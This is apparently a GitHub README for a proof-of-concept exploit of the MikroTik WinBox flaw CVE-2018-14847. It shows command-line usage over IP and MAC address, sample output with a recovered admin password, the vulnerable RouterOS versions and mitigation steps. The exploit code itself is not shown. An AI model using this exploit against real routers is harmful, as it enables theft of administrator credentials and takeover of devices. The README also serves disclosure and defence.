Proof of Concept of Winbox Critical Vulnerability (CVE-2018-14847)
Switch branches/tags
Nothing to show
Clone or download
mosajjal Merge pull request #22 from Deantwo/patch-1
User feedback and optional portnumber
Latest commit e02fe7b Nov 12, 2018


This is a proof of concept of the critical WinBox vulnerability (CVE-2018-14847) which allows for arbitrary file read of plain text passwords.



  • Python 3+

This script will NOT run with Python 2.x or lower.

How To Use

The script is simple used with simple arguments in the commandline.

WinBox (TCP/IP)

Exploit the vulnerability and read the password.

python3 <ip-address>


$ python3

User: admin
Pass: Th3P4ssWord

MAC server WinBox (Layer 2)

You can extract files even if the device doesn't have an IP address.

Simple discovery check for locally connected Mikrotik devices.



$ python3
Looking for Mikrotik devices (MAC servers)



Exploit the vulnerability and read the password.

python3 <mac-address>


$ python3 aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Vulnerable Versions

All RouterOS versions from 2015-05-28 to 2018-04-20 are vulnerable to this exploit.

Mikrotik devices running RouterOS versions:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

For more information see:

Mitigation Techniques

  • Upgrade the router to a RouterOS version that include the fix.
  • Disable the WinBox service on the router.
  • You can restricct access to the WinBox service to specific IP-addresses wtih the following:
/ip service set winbox address=,,
  • You may use some Filter Rules (ACL) to deny external access to the WinBox service:
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • Limiting access to the mac-winbox service can be done by specifing allowed interfaces:
/tool mac-server mac-winbox